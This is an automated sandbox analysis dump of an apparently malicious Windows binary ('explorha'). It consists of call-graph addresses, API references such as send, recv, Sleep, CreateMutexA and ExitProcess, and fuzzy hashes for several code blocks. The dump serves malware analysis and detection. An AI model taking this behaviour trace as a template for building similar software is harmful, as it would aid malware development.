__cftof 3 API calls 10654->10655 10656 740be0 __cftof 10655->10656 10657 740c26 10656->10657 10658 73a20f __cftof 3 API calls 10656->10658 10657->10648 10659 740c4b 10658->10659 10661 73bc91 __cftof 3 API calls 10660->10661 10662 73fcdb 10661->10662 10665 73fbe9 10662->10665 10664 73fce1 10664->10650 10666 73fbf5 __cftof __freea 10665->10666 10667 73fc16 10666->10667 10668 73a20f __cftof 3 API calls 10666->10668 10667->10664 10669 73fc88 10668->10669 10670 73fcc4 10669->10670 10674 73bd4e 10669->10674 10670->10664 10675 73bd59 __dosmaperr __freea 10674->10675 10676 73a20f __cftof GetPEB ExitProcess GetPEB 10675->10676 10678 73bdde 10675->10678 10677 73bde7 10676->10677 10679 73fad0 10678->10679 10680 73fbe9 __cftof GetPEB ExitProcess GetPEB 10679->10680 10681 73fae3 10680->10681 10682 73f879 __cftof GetPEB ExitProcess GetPEB 10681->10682 10683 73faeb __cftof 10682->10683 10684 73fce4 __cftof GetPEB ExitProcess GetPEB 10683->10684 10685 73fafc __cftof __dosmaperr __freea 10683->10685 10684->10685 10685->10670 10687 739725 10686->10687 10688 73971e 10686->10688 10687->10640 10715 7390fd 10688->10715 10690 739724 10690->10640 10692 739378 10691->10692 10693 73937f 10691->10693 10694 7390fd 3 API calls 10692->10694 10693->10640 10695 73937e 10694->10695 10695->10640 10698 73939c 10696->10698 10699 7393b6 __cftof __dosmaperr 10696->10699 10697 739516 10704 739524 10697->10704 10705 739538 10697->10705 10733 7397ee 10697->10733 10698->10697 10698->10699 10700 73954f 10698->10700 10698->10704 10699->10640 10700->10705 10729 73993d 10700->10729 10704->10705 10737 739c97 10704->10737 10705->10640 10707 739516 10706->10707 10709 7394fc 10706->10709 10710 7397ee 3 API calls 10707->10710 10713 739524 10707->10713 10714 739538 10707->10714 10708 73954f 10711 73993d 3 API calls 10708->10711 10708->10714 10709->10707 10709->10708 10709->10713 10710->10713 10711->10713 10712 739c97 3 API calls 10712->10714 10713->10712 10713->10714 10714->10640 10716 73910f __dosmaperr 
10715->10716 10719 73a0d9 10716->10719 10718 739132 __dosmaperr 10718->10690 10720 73a0f4 10719->10720 10723 739e37 10720->10723 10722 73a0fe 10722->10718 10724 739e49 10723->10724 10725 737f9a __cftof GetPEB ExitProcess GetPEB 10724->10725 10728 739e5e __cftof __dosmaperr 10724->10728 10727 739e8e 10725->10727 10726 73a085 GetPEB ExitProcess GetPEB 10726->10727 10727->10726 10727->10728 10728->10722 10731 739958 10729->10731 10730 73998a 10730->10704 10731->10730 10741 73ddbf 10731->10741 10734 739807 10733->10734 10748 73e8f9 10734->10748 10736 7398ba 10736->10704 10736->10736 10739 739d0a std::invalid_argument::invalid_argument 10737->10739 10740 739cb4 10737->10740 10738 73ddbf __cftof 3 API calls 10738->10740 10739->10705 10740->10738 10740->10739 10744 73dc64 10741->10744 10743 73ddd7 10743->10730 10745 73dc74 10744->10745 10746 737f9a __cftof GetPEB ExitProcess GetPEB 10745->10746 10747 73dc79 __cftof __dosmaperr 10745->10747 10746->10747 10747->10743 10749 73e91f 10748->10749 10760 73e909 __cftof __dosmaperr 10748->10760 10750 73e9b6 10749->10750 10751 73e9bb 10749->10751 10749->10760 10753 73ea15 10750->10753 10754 73e9df 10750->10754 10761 73e110 10751->10761 10778 73e429 10753->10778 10755 73e9e4 10754->10755 10756 73e9fd 10754->10756 10767 73e76f 10755->10767 10774 73e613 10756->10774 10760->10736 10762 73e122 10761->10762 10763 737f9a __cftof GetPEB ExitProcess GetPEB 10762->10763 10764 73e136 10763->10764 10765 73e429 GetPEB ExitProcess GetPEB 10764->10765 10766 73e13e __alldvrm __cftof __dosmaperr _strrchr 10764->10766 10765->10766 10766->10760 10768 73e79d 10767->10768 10769 73e80f 10768->10769 10771 73e7e8 10768->10771 10772 73e7d6 10768->10772 10770 73e4cb GetPEB ExitProcess GetPEB 10769->10770 10770->10772 10771->10771 10773 73e69e GetPEB ExitProcess GetPEB 10771->10773 10772->10760 10773->10772 10775 73e640 10774->10775 10776 73e67f 10775->10776 10777 73e69e GetPEB ExitProcess GetPEB 10775->10777 10776->10760 10777->10776 10779 73e441 
10778->10779 10780 73e4a6 10779->10780 10781 73e4cb GetPEB ExitProcess GetPEB 10779->10781 10780->10760 10781->10780 10842 702a10 10843 702a1a 10842->10843 10844 702a1c 10842->10844 10847 71d8fa 10844->10847 10848 71d922 10847->10848 10849 71d904 10847->10849 10848->10848 10849->10848 10851 71d927 10849->10851 10854 7029e0 10851->10854 10853 71d93e Concurrency::cancel_current_task 10865 71d56f 10854->10865 10856 7029ff 10856->10853 10857 7029f4 __cftof 10857->10856 10858 73bc91 __cftof 3 API calls 10857->10858 10862 73835c 10858->10862 10859 73a20f __cftof 3 API calls 10860 738386 10859->10860 10861 738395 10860->10861 10868 73801d 10860->10868 10861->10853 10862->10859 10864 7383bd __freea 10864->10853 10871 71e2c1 10865->10871 10869 737f9a __cftof 3 API calls 10868->10869 10870 73802f 10869->10870 10870->10864 10872 71e2cf InitOnceExecuteOnce 10871->10872 10874 71d582 10871->10874 10872->10874 10874->10857 11121 70d8d0 11122 70d911 recv 11121->11122 11123 70d932 recv 11122->11123 11125 70d967 recv 11123->11125 11127 70d9a1 11125->11127 11175 702a90 11176 702ace 11175->11176 11177 71ce8b TpReleaseWork 11176->11177 11178 702adb shared_ptr std::invalid_argument::invalid_argument 11177->11178 11128 7380d4 11129 7380e2 11128->11129 11130 7380ec 11128->11130 11131 73801d 3 API calls 11130->11131 11132 738106 __freea 11131->11132 10782 70205a 10783 71dd8c InitializeCriticalSectionEx 10782->10783 10784 702064 10783->10784 11133 70d2dc 11135 70d2e9 shared_ptr 11133->11135 11134 70d352 shared_ptr std::invalid_argument::invalid_argument 11135->11134 11136 71dd3c GetSystemTimePreciseAsFileTime 11135->11136 11137 70d410 11136->11137 11138 70d4fb 11137->11138 11139 70d41b 11137->11139 11141 71d8fa 4 API calls 11138->11141 11140 70d434 send 11139->11140 11142 70d451 11139->11142 11140->11139 11140->11142 11145 70d4cf __Mtx_unlock 11141->11145 11143 70d470 send 11142->11143 11147 70d48d 11142->11147 11143->11142 11143->11147 11144 71d8fa 4 API calls 11150 70d507 __cftof 
11144->11150 11145->11144 11148 70d4e8 std::invalid_argument::invalid_argument 11145->11148 11146 70d4b2 send 11146->11147 11147->11145 11147->11146 11149 70d879 shared_ptr std::invalid_argument::invalid_argument 11150->11149 11151 71dd3c GetSystemTimePreciseAsFileTime 11150->11151 11152 70d6e2 11151->11152 11152->11149 11153 71d8fa 4 API calls 11152->11153 11154 70d8ad 11153->11154 11155 71d8fa 4 API calls 11154->11155 11156 70d8bd 11155->11156 11157 71d8fa 4 API calls 11156->11157 11158 70d8c3 11157->11158 11159 71d8fa 4 API calls 11158->11159 11160 70d8c9 11159->11160 11253 71e75c 11254 71e76b 11253->11254 11255 71e814 11254->11255 11256 71e810 RtlWakeAllConditionVariable 11254->11256 11179 703e9f 11180 703eb6 11179->11180 11181 703ead 11179->11181 11183 702310 11181->11183 11184 702324 11183->11184 11187 71cbbd 11184->11187 11195 73517a 11187->11195 11189 70232a 11189->11180 11190 71cc35 ___std_exception_copy 11202 71c83d 11190->11202 11192 71cc28 11198 71c5e6 11192->11198 11206 7365b9 11195->11206 11197 71cbe5 11197->11189 11197->11190 11197->11192 11199 71c62f ___std_exception_copy 11198->11199 11201 71c642 shared_ptr 11199->11201 11212 71ca2f 11199->11212 11201->11189 11203 71c868 11202->11203 11205 71c871 shared_ptr 11202->11205 11204 71ca2f 4 API calls 11203->11204 11204->11205 11205->11189 11207 7365be __cftof 11206->11207 11207->11197 11208 73ec54 __cftof 3 API calls 11207->11208 11211 73a21f __cftof 11207->11211 11208->11211 11209 737c7d __cftof 3 API calls 11210 73a252 11209->11210 11211->11209 11213 71d56f InitOnceExecuteOnce 11212->11213 11214 71ca71 11213->11214 11215 71ca78 11214->11215 11216 73834b 3 API calls 11214->11216 11215->11201 11217 71caae 11216->11217 11218 71d56f InitOnceExecuteOnce 11217->11218 11219 71caf1 11218->11219 11220 71caf8 11219->11220 11221 73834b 3 API calls 11219->11221 11220->11201 11222 71cb2e 11221->11222 11222->11201 11312 70d5df 11314 70d5e3 __cftof __dosmaperr 11312->11314 11313 70d879 shared_ptr 
std::invalid_argument::invalid_argument 11314->11313 11315 71dd3c GetSystemTimePreciseAsFileTime 11314->11315 11316 70d6e2 11315->11316 11316->11313 11317 71d8fa 4 API calls 11316->11317 11318 70d8ad 11317->11318 11319 71d8fa 4 API calls 11318->11319 11320 70d8bd 11319->11320 11321 71d8fa 4 API calls 11320->11321 11322 70d8c3 11321->11322 11323 71d8fa 4 API calls 11322->11323 11324 70d8c9 11323->11324 10890 708600 10891 70864c 10890->10891 10892 705d40 3 API calls 10891->10892 10894 708667 shared_ptr 10892->10894 10893 7087d1 shared_ptr std::invalid_argument::invalid_argument 10894->10893 10895 705d40 3 API calls 10894->10895 10897 70886a shared_ptr 10895->10897 10896 70894e shared_ptr std::invalid_argument::invalid_argument 10897->10896 10898 705d40 3 API calls 10897->10898 10899 7089ea shared_ptr std::invalid_argument::invalid_argument 10898->10899 11305 702d00 11306 702d28 11305->11306 11307 71dd1b __Mtx_init_in_situ 2 API calls 11306->11307 11308 702d33 11307->11308 10900 70da05 10901 70da15 10900->10901 10904 719e60 10901->10904 10903 70da4a std::invalid_argument::invalid_argument 10905 719eba __cftof 10904->10905 10911 71b240 10905->10911 10909 719f69 std::_Throw_future_error 10910 719efc std::invalid_argument::invalid_argument 10910->10903 10924 71b580 10911->10924 10913 71b275 10928 702be0 10913->10928 10915 71b2a6 10937 71b600 10915->10937 10917 719ee4 10917->10910 10918 7042f0 10917->10918 10919 71d56f InitOnceExecuteOnce 10918->10919 10920 70430a 10919->10920 10921 704311 10920->10921 10922 73834b 3 API calls 10920->10922 10921->10909 10923 704324 10922->10923 10925 71b59c 10924->10925 10926 71dd1b __Mtx_init_in_situ 2 API calls 10925->10926 10927 71b5a7 10926->10927 10927->10913 10929 702c1d 10928->10929 10930 71d56f InitOnceExecuteOnce 10929->10930 10931 702c46 10930->10931 10932 702c88 10931->10932 10933 702c51 std::invalid_argument::invalid_argument 10931->10933 10942 71d587 10931->10942 10949 702340 10932->10949 10933->10915 10938 71b67f shared_ptr 
10937->10938 10940 71b6e8 10938->10940 10972 71b8a0 10938->10972 10941 71b6cb 10941->10917 10943 71d593 Concurrency::cancel_current_task 10942->10943 10944 71d603 10943->10944 10945 71d5fa 10943->10945 10947 7029e0 4 API calls 10944->10947 10952 71d50f 10945->10952 10948 71d5ff 10947->10948 10948->10932 10967 71cc66 10949->10967 10951 702372 10953 71e2c1 InitOnceExecuteOnce 10952->10953 10954 71d527 10953->10954 10955 71d52e 10954->10955 10958 73834b 10954->10958 10955->10948 10957 71d537 10957->10948 10959 738357 __cftof 10958->10959 10960 73bc91 __cftof 3 API calls 10959->10960 10961 73835c 10960->10961 10962 73a20f __cftof 3 API calls 10961->10962 10963 738386 10962->10963 10964 73801d 3 API calls 10963->10964 10965 738395 10963->10965 10966 7383bd __freea 10964->10966 10965->10957 10966->10957 10968 71cc81 Concurrency::cancel_current_task 10967->10968 10969 73a20f __cftof 3 API calls 10968->10969 10971 71cce8 __cftof std::invalid_argument::invalid_argument 10968->10971 10970 71cd2f 10969->10970 10971->10951 10973 71b920 10972->10973 10979 718800 10973->10979 10975 71b95c shared_ptr 10976 71bb4e shared_ptr 10975->10976 10977 703de0 3 API calls 10975->10977 10976->10941 10978 71bb36 10977->10978 10978->10941 10980 718841 10979->10980 10987 703870 10980->10987 10982 718a76 std::invalid_argument::invalid_argument 10982->10975 10983 7188dd __cftof 10983->10982 10984 71dd1b __Mtx_init_in_situ 2 API calls 10983->10984 10985 718a31 10984->10985 10992 702dc0 10985->10992 10988 71dd1b __Mtx_init_in_situ 2 API calls 10987->10988 10989 7038a7 10988->10989 10990 71dd1b __Mtx_init_in_situ 2 API calls 10989->10990 10991 7038e6 10990->10991 10991->10983 10993 702e06 10992->10993 10996 702e6f 10992->10996 11026 71dd3c 10993->11026 10997 702eef 10996->10997 11003 71dd3c GetSystemTimePreciseAsFileTime 10996->11003 10997->10982 10998 702f1e 10999 71d8fa 4 API calls 10998->10999 11000 702f24 10999->11000 11001 71d8fa 4 API calls 11000->11001 11004 702eb9 11001->11004 11002 702e1d 
__Mtx_unlock 11002->10996 11002->11000 11003->11004 11005 71d8fa 4 API calls 11004->11005 11006 702ec0 __Mtx_unlock 11004->11006 11005->11006 11007 71d8fa 4 API calls 11006->11007 11008 702ed8 __Cnd_broadcast 11006->11008 11007->11008 11008->10997 11009 71d8fa 4 API calls 11008->11009 11010 702f3c 11009->11010 11011 71dd3c GetSystemTimePreciseAsFileTime 11010->11011 11015 702f80 shared_ptr __Mtx_unlock 11011->11015 11012 7030c5 11013 71d8fa 4 API calls 11012->11013 11014 7030cb 11013->11014 11016 71d8fa 4 API calls 11014->11016 11015->11012 11015->11014 11019 7030a7 std::invalid_argument::invalid_argument 11015->11019 11022 71dd3c GetSystemTimePreciseAsFileTime 11015->11022 11017 7030d1 11016->11017 11018 71d8fa 4 API calls 11017->11018 11023 703093 __Mtx_unlock 11018->11023 11019->10982 11020 71d8fa 4 API calls 11021 7030dd 11020->11021 11024 70305f 11022->11024 11023->11019 11023->11020 11024->11012 11024->11017 11024->11023 11029 71d3dc 11024->11029 11032 71dae2 11026->11032 11028 702e12 11028->10998 11028->11002 11045 71d202 11029->11045 11031 71d3ec 11031->11024 11033 71db0a std::invalid_argument::invalid_argument 11032->11033 11034 71db38 11032->11034 11033->11028 11034->11033 11038 71e5fb 11034->11038 11036 71db8d __Xtime_diff_to_millis2 11036->11033 11037 71e5fb _xtime_get GetSystemTimePreciseAsFileTime 11036->11037 11037->11036 11039 71e60a 11038->11039 11041 71e617 __aulldvrm 11038->11041 11039->11041 11042 71e5d4 11039->11042 11041->11036 11043 71e27a __Xtime_get_ticks GetSystemTimePreciseAsFileTime 11042->11043 11044 71e5e2 11043->11044 11044->11041 11046 71d22c 11045->11046 11047 71e5fb _xtime_get GetSystemTimePreciseAsFileTime 11046->11047 11048 71d234 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 11046->11048 11049 71d25f __Xtime_diff_to_millis2 11047->11049 11048->11031 11049->11048 11050 71e5fb _xtime_get GetSystemTimePreciseAsFileTime 11049->11050 11050->11048 11257 703b47 11258 703b51 11257->11258 11261 703b5f 11258->11261 11264 
7031d0 11258->11264 11259 703b68 11261->11259 11283 703710 11261->11283 11265 71dd3c GetSystemTimePreciseAsFileTime 11264->11265 11272 703214 11265->11272 11266 70326b 11267 71d8fa 4 API calls 11266->11267 11268 70323c __Mtx_unlock 11267->11268 11270 71d8fa 4 API calls 11268->11270 11273 703250 std::invalid_argument::invalid_argument 11268->11273 11269 71d3dc GetSystemTimePreciseAsFileTime 11269->11272 11271 703277 11270->11271 11274 71dd3c GetSystemTimePreciseAsFileTime 11271->11274 11272->11266 11272->11268 11272->11269 11273->11261 11275 7032af 11274->11275 11276 71d8fa 4 API calls 11275->11276 11277 7032b6 __Cnd_broadcast 11275->11277 11276->11277 11278 71d8fa 4 API calls 11277->11278 11279 7032d7 __Mtx_unlock 11277->11279 11278->11279 11280 71d8fa 4 API calls 11279->11280 11281 7032eb 11279->11281 11282 70330e 11280->11282 11281->11261 11282->11261 11284 70371c 11283->11284 11285 702340 3 API calls 11284->11285 11286 70373e 11285->11286 11352 70958c 11353 7095ac shared_ptr 11352->11353 11354 70a423 Sleep CreateMutexA 11353->11354 11355 70961b shared_ptr 11353->11355 11356 70a45e 11354->11356 11223 70c48d 11231 70c498 shared_ptr 11223->11231 11224 70c61d shared_ptr std::invalid_argument::invalid_argument 11225 70c645 11227 705d40 3 API calls 11225->11227 11226 705d40 3 API calls 11226->11231 11229 70c6ad 11227->11229 11236 70c290 11229->11236 11231->11224 11231->11225 11231->11226 11232 708b00 11231->11232 11233 708b50 11232->11233 11234 705d40 3 API calls 11233->11234 11235 708b6a shared_ptr std::invalid_argument::invalid_argument 11234->11235 11235->11231 11242 70c2fd 11236->11242 11237 70c61d shared_ptr std::invalid_argument::invalid_argument 11238 705d40 3 API calls 11238->11242 11239 708b00 3 API calls 11239->11242 11240 70c645 11241 705d40 3 API calls 11240->11241 11243 70c6ad 11241->11243 11242->11237 11242->11238 11242->11239 11242->11240 11244 70c290 3 API calls 11243->11244 11357 73d18d 11358 73d1b7 11357->11358 11360 73d19d __cftof __dosmaperr 
11357->11360 11359 737f9a __cftof 3 API calls 11358->11359 11358->11360 11359->11360 11361 703b8e 11362 703b98 11361->11362 11363 702310 4 API calls 11362->11363 11364 703ba5 11362->11364 11363->11364 11365 703bcf 11364->11365 11366 703710 3 API calls 11364->11366 11367 703710 3 API calls 11365->11367 11366->11365 11368 703bdb 11367->11368

Control-flow Graph

control_flow_graph 304 737bbb-737bc8 call 73b922 307 737bea-737bfc call 737bfd ExitProcess 304->307 308 737bca-737bd8 GetPEB 304->308 308->307 309 737bda-737be9 308->309 309->307

APIs
• ExitProcess.KERNEL32(?,?,00737BBA,?,?,?,?,?,00738C0E), ref: 00737BF6

Memory Dump Source
• Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                                                        • Opcode ID: 7643514b589ef67b10c6670487b577ba6e4545282dd4a09f87b355fe6e48b6c7
                                                                                                                                                                                                                                        • Instruction ID: da78a9e1c2988654f7951ca5614683030952f7e5b040bb4e7f16f517186fb25e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7643514b589ef67b10c6670487b577ba6e4545282dd4a09f87b355fe6e48b6c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFE08CB044A20CEAEE39BB58D854E987B6DEB52350F110814F9049AA22CB29FC42C981
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 0 709675-709695 4 7096c3-7096df 0->4 5 709697-7096a3 0->5 8 7096e1-7096ed 4->8 9 70970d-70972c 4->9 6 7096a5-7096b3 5->6 7 7096b9-7096c0 call 71ecf8 5->7 6->7 12 70a3ec 6->12 7->4 14 709703-70970a call 71ecf8 8->14 15 7096ef-7096fd 8->15 10 70975a-70a3e6 call 719750 9->10 11 70972e-70973a 9->11 16 709750-709757 call 71ecf8 11->16 17 70973c-70974a 11->17 19 70a423-70a466 Sleep CreateMutexA 12->19 20 70a3ec call 7382fa 12->20 14->9 15->12 15->14 16->10 17->12 17->16 20->19
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: ca4f42defd9e926ded9363cc3127d5900b3d32d2b33466da7eba7c7b20108259
                                                                                                                                                                                                                                        • Instruction ID: d3c6ad5fabe54ab9c163523ba087cf8e9f44df7dd18125cce4c27af31038860b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca4f42defd9e926ded9363cc3127d5900b3d32d2b33466da7eba7c7b20108259
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF310572610204DBEB08DB6CCC897ADBAA6EB86314F208718E515D72D3D7BD59808791
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 31 709a14-709a34 35 709a62-709a7e 31->35 36 709a36-709a42 31->36 39 709a80-709a8c 35->39 40 709aac-709acb 35->40 37 709a44-709a52 36->37 38 709a58-709a5f call 71ecf8 36->38 37->38 43 70a3fb 37->43 38->35 45 709aa2-709aa9 call 71ecf8 39->45 46 709a8e-709a9c 39->46 41 709af9-70a3e6 call 719750 40->41 42 709acd-709ad9 40->42 48 709adb-709ae9 42->48 49 709aef-709af6 call 71ecf8 42->49 51 70a423-70a466 Sleep CreateMutexA 43->51 52 70a3fb call 7382fa 43->52 45->40 46->43 46->45 48->43 48->49 49->41 52->51
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: dea28dc18a937a1505b085d73be4baf010dc748737391d73bd8586bc606623ff
                                                                                                                                                                                                                                        • Instruction ID: a3e3e66e9d1cd821183acd2760405af6a2138324c268fd192a00e27db47c7af5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dea28dc18a937a1505b085d73be4baf010dc748737391d73bd8586bc606623ff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC3135B1714244DBEB08DB6CCC887ADFBA2EB86314F208718E914D72D2E77D5980C751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 62 709b49-709b69 66 709b97-709bb3 62->66 67 709b6b-709b77 62->67 68 709be1-709c00 66->68 69 709bb5-709bc1 66->69 70 709b79-709b87 67->70 71 709b8d-709b94 call 71ecf8 67->71 74 709c02-709c0e 68->74 75 709c2e-70a3e6 call 719750 68->75 72 709bc3-709bd1 69->72 73 709bd7-709bde call 71ecf8 69->73 70->71 76 70a400 70->76 71->66 72->73 72->76 73->68 79 709c10-709c1e 74->79 80 709c24-709c2b call 71ecf8 74->80 82 70a423-70a466 Sleep CreateMutexA 76->82 83 70a400 call 7382fa 76->83 79->76 79->80 80->75 83->82
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 4d4d9fd37bf137020c4c2c7de1c01811e02b8390faef5164f6acc2884d73adb6
                                                                                                                                                                                                                                        • Instruction ID: ef9ce1ffdd69ec8666e18dca97f8bb06dd89b6215364db9943ff254e19267caa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d4d9fd37bf137020c4c2c7de1c01811e02b8390faef5164f6acc2884d73adb6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD3126B1604244DBFB08DB7CDC8979DBBE2EB86324F208718E915D72D2D7BD59808761
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 93 709c7e-709c9e 97 709ca0-709cac 93->97 98 709ccc-709ce8 93->98 99 709cc2-709cc9 call 71ecf8 97->99 100 709cae-709cbc 97->100 101 709d16-709d35 98->101 102 709cea-709cf6 98->102 99->98 100->99 103 70a405 100->103 107 709d63-70a3e6 call 719750 101->107 108 709d37-709d43 101->108 105 709cf8-709d06 102->105 106 709d0c-709d13 call 71ecf8 102->106 110 70a423-70a466 Sleep CreateMutexA 103->110 111 70a405 call 7382fa 103->111 105->103 105->106 106->101 114 709d45-709d53 108->114 115 709d59-709d60 call 71ecf8 108->115 111->110 114->103 114->115 115->107
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
